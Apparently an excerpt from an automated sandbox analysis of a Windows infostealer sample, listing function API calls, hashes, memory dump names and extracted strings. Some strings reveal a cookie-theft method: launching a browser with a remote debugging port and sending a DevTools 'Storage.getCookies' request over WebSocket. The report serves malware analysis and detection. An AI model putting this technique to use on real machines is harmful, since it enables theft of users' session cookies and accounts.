                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32lstrcat$Closememset$HandleNextProcessstrlen$CreateDesktopOpen$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                          • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                          • API String ID: 2040986984-1862457068
                          • Opcode ID: a3c102c09e60c9d1d9b99ec76dd0797ca2b5578229fbc19df4fe2a81e50b3120
                          • Instruction ID: ffd46c0a4ee7b30391b9649ab1384d4c088e4c0177237cd1cb11e9461ea7ecda
                          • Opcode Fuzzy Hash: a3c102c09e60c9d1d9b99ec76dd0797ca2b5578229fbc19df4fe2a81e50b3120
                          • Instruction Fuzzy Hash: 519154B1A14218EFDB14DFA4DC89FDE77B9AF48700F108155F609A7191DFB4AA448F90
                          Function 00711269 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00711291
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007112B4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007112BF
                          • lstrlen.KERNEL32(00734CA8), ref: 007112CA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007112E7
                          • lstrcat.KERNEL32(00000000,00734CA8), ref: 007112F3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071131E
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0071133A
                          • StrCmpCA.SHLWAPI(?,007317A0), ref: 0071135C
                          • StrCmpCA.SHLWAPI(?,007317A4), ref: 00711376
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007113AF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007113D7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007113E2
                          • lstrlen.KERNEL32(00731794), ref: 007113ED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071140A
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00711416
                          • lstrlen.KERNEL32(?), ref: 00711423
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711443
                          • lstrcat.KERNEL32(00000000,?), ref: 00711451
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071147A
                          • StrCmpCA.SHLWAPI(?,010DCC38), ref: 007114A3
                          • lstrcpy.KERNEL32(00000000,?), ref: 007114E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071150D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711535
                          • StrCmpCA.SHLWAPI(?,010DD228), ref: 00711552
                          • lstrcpy.KERNEL32(00000000,?), ref: 00711593
                          • lstrcpy.KERNEL32(00000000,?), ref: 007115BC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007115E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00711796
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007117BE
                          • lstrcpy.KERNEL32(00000000,?), ref: 007117F5
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0071181C
                          • FindClose.KERNEL32(00000000), ref: 0071182B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                          • String ID:
                          • API String ID: 1346933759-0
                          • Opcode ID: 5b6b1293fd09cee0ff3ced0ed72b8cbb1863fc0989a7be3761715cfe3f385f0d
                          • Instruction ID: c07b3486f4a7447a06f2700e5b0403e2056c7f418489367d1c8038a1ababbd36
                          • Opcode Fuzzy Hash: 5b6b1293fd09cee0ff3ced0ed72b8cbb1863fc0989a7be3761715cfe3f385f0d
                          • Instruction Fuzzy Hash: 20C16171A25606DBCB21EF78DC8DAEE77F8AF44700F444528F945A7292DB38DC458B90
                          Function 0071E210 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0071E22C
                          • FindFirstFileA.KERNEL32(?,?), ref: 0071E243
                          • StrCmpCA.SHLWAPI(?,007317A0), ref: 0071E263
                          • StrCmpCA.SHLWAPI(?,007317A4), ref: 0071E27D
                          • wsprintfA.USER32 ref: 0071E2A2
                          • StrCmpCA.SHLWAPI(?,0072CFEC), ref: 0071E2B4
                          • wsprintfA.USER32 ref: 0071E2D1
                            • Part of subcall function 0071EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0071EE12
                          • wsprintfA.USER32 ref: 0071E2F0
                          • PathMatchSpecA.SHLWAPI(?,?), ref: 0071E304
                          • lstrcat.KERNEL32(?,010DE468), ref: 0071E335
                          • lstrcat.KERNEL32(?,00731794), ref: 0071E347
                          • lstrcat.KERNEL32(?,?), ref: 0071E358
                          • lstrcat.KERNEL32(?,00731794), ref: 0071E36A
                          • lstrcat.KERNEL32(?,?), ref: 0071E37E
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0071E394
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071E3D2
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071E422
                          • DeleteFileA.KERNEL32(?), ref: 0071E45C
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 00701557
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 00701579
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 0070159B
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 007015FF
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0071E49B
                          • FindClose.KERNEL32(00000000), ref: 0071E4AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                          • String ID: %s\%s$%s\*
                          • API String ID: 1375681507-2848263008
                          • Opcode ID: a5057025038360e505da200705ce7119eccf7ea471d6700753d408e0944a37dc
                          • Instruction ID: 79fdcbaf1f777d0f928b9823b54109d766a40a910979138fd6125e8d1e78925e
                          • Opcode Fuzzy Hash: a5057025038360e505da200705ce7119eccf7ea471d6700753d408e0944a37dc
                          • Instruction Fuzzy Hash: C98195B2914218DBCB24EF74DC49AEF77B9BF44300F044598B90AA7191DF78AA49CF90
                          Function 007016B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007016E2
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00701719
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070176C
                          • lstrcat.KERNEL32(00000000), ref: 00701776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007017A2
                          • lstrcpy.KERNEL32(00000000,?), ref: 007018F3
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007018FE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat
                          • String ID: \*.*
                          • API String ID: 2276651480-1173974218
                          • Opcode ID: 34715bc8e7ae4abb3894a8d71993ce931e75e5664c9e2086c4a0ca614ccd6193
                          • Instruction ID: 914c77e45445281f91d108724c645f99be741777500d796e060641c410abc4c1
                          • Opcode Fuzzy Hash: 34715bc8e7ae4abb3894a8d71993ce931e75e5664c9e2086c4a0ca614ccd6193
                          • Instruction Fuzzy Hash: 98816772924255DBCB21EF68D98DAAE77F5AF14300F444214F805B72D2CB38ED05CB91
                          Function 0071DD30 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0071DD45
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0071DD4C
                          • wsprintfA.USER32 ref: 0071DD62
                          • FindFirstFileA.KERNEL32(?,?), ref: 0071DD79
                          • StrCmpCA.SHLWAPI(?,007317A0), ref: 0071DD9C
                          • StrCmpCA.SHLWAPI(?,007317A4), ref: 0071DDB6
                          • wsprintfA.USER32 ref: 0071DDD4
                          • DeleteFileA.KERNEL32(?), ref: 0071DE20
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0071DDED
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 00701557
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 00701579
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 0070159B
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 007015FF
                            • Part of subcall function 0071D980: memset.MSVCRT ref: 0071D9A1
                            • Part of subcall function 0071D980: memset.MSVCRT ref: 0071D9B3
                            • Part of subcall function 0071D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0071D9DB
                            • Part of subcall function 0071D980: lstrcpy.KERNEL32(00000000,?), ref: 0071DA0E
                            • Part of subcall function 0071D980: lstrcat.KERNEL32(?,00000000), ref: 0071DA1C
                            • Part of subcall function 0071D980: lstrcat.KERNEL32(?,010DD930), ref: 0071DA36
                            • Part of subcall function 0071D980: lstrcat.KERNEL32(?,?), ref: 0071DA4A
                            • Part of subcall function 0071D980: lstrcat.KERNEL32(?,010DCCB0), ref: 0071DA5E
                            • Part of subcall function 0071D980: lstrcpy.KERNEL32(00000000,?), ref: 0071DA8E
                            • Part of subcall function 0071D980: GetFileAttributesA.KERNEL32(00000000), ref: 0071DA95
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0071DE2E
                          • FindClose.KERNEL32(00000000), ref: 0071DE3D
                          • lstrcat.KERNEL32(?,010DE468), ref: 0071DE66
                          • lstrcat.KERNEL32(?,010DD208), ref: 0071DE7A
                          • lstrlen.KERNEL32(?), ref: 0071DE84
                          • lstrlen.KERNEL32(?), ref: 0071DE92
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071DED2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                          • String ID: %s\%s$%s\*
                          • API String ID: 4184593125-2848263008
                          • Opcode ID: b5b26fc30000b60bfb1ee2ddb4b7285a763e8cdff2274c3ba5e3bbaa2b3fb283
                          • Instruction ID: a61142ad873b7234849379c18a63d952f9cad32fafb72dc4771de18cff77e473
                          • Opcode Fuzzy Hash: b5b26fc30000b60bfb1ee2ddb4b7285a763e8cdff2274c3ba5e3bbaa2b3fb283
                          • Instruction Fuzzy Hash: EA614472A14208EBCB24EF78DC89ADE77B9BF48300F044594B945A7291DF38AE45DF90
                          Function 0071D530 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0071D54D
                          • FindFirstFileA.KERNEL32(?,?), ref: 0071D564
                          • StrCmpCA.SHLWAPI(?,007317A0), ref: 0071D584
                          • StrCmpCA.SHLWAPI(?,007317A4), ref: 0071D59E
                          • lstrcat.KERNEL32(?,010DE468), ref: 0071D5E3
                          • lstrcat.KERNEL32(?,010DE4C8), ref: 0071D5F7
                          • lstrcat.KERNEL32(?,?), ref: 0071D60B
                          • lstrcat.KERNEL32(?,?), ref: 0071D61C
                          • lstrcat.KERNEL32(?,00731794), ref: 0071D62E
                          • lstrcat.KERNEL32(?,?), ref: 0071D642
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071D682
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071D6D2
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0071D737
                          • FindClose.KERNEL32(00000000), ref: 0071D746
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 50252434-4073750446
                          • Opcode ID: 4b52a8f8457dd993d0c80c0c888c5c0eba6622f6aaaa7f98249293121b68f321
                          • Instruction ID: f1a250b43bf1fa2a351b128761806e233a0b096488bd9d06454998d8d0bda60b
                          • Opcode Fuzzy Hash: 4b52a8f8457dd993d0c80c0c888c5c0eba6622f6aaaa7f98249293121b68f321
                          • Instruction Fuzzy Hash: 536156B5910219DBCB24EF78DC89ADE77B5EF48300F008595F549A7291DB38AE45CF90
                          Function 00ABD786 Relevance: 16.6, Strings: 12, Instructions: 1629COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !T{$/k}$/p=;$?Uj1$OqV$XHS^$`&s1$hpy$r%3$v%3$u{$}}
                          • API String ID: 0-1495936055
                          • Opcode ID: b45f0a3169358b4adade9899843ae2dc0cfaced62ce5b9f08f2dcb281418beb5
                          • Instruction ID: cb5903cd587bf788b3f1925269d2c8c1bde446e56f87e58b56c9b1b9c642b0b5
                          • Opcode Fuzzy Hash: b45f0a3169358b4adade9899843ae2dc0cfaced62ce5b9f08f2dcb281418beb5
                          • Instruction Fuzzy Hash: A7B204F360C2049FD308AE2DEC9567AFBE9EF94720F1A492DE6C5C7744EA3158418693
                          Function 007248B0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                          • API String ID: 909987262-758292691
                          • Opcode ID: ae22934d99532bf0312d4ef5a76b658e0b529d9a4fed94f0556a4203051be5d8
                          • Instruction ID: b8e7beb5808b33123c59f38f755ce0dc368b66f0ee50480993e12534fc6e0ea2
                          • Opcode Fuzzy Hash: ae22934d99532bf0312d4ef5a76b658e0b529d9a4fed94f0556a4203051be5d8
                          • Instruction Fuzzy Hash: 28A24871D01269DFDB20DFA8D8807EDBBB6BF48300F1481A9E558A7281DB795E85CF90
                          Function 007123A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007123D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007123F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00712402
                          • lstrlen.KERNEL32(\*.*), ref: 0071240D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071242A
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 00712436
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071246A
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00712486
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
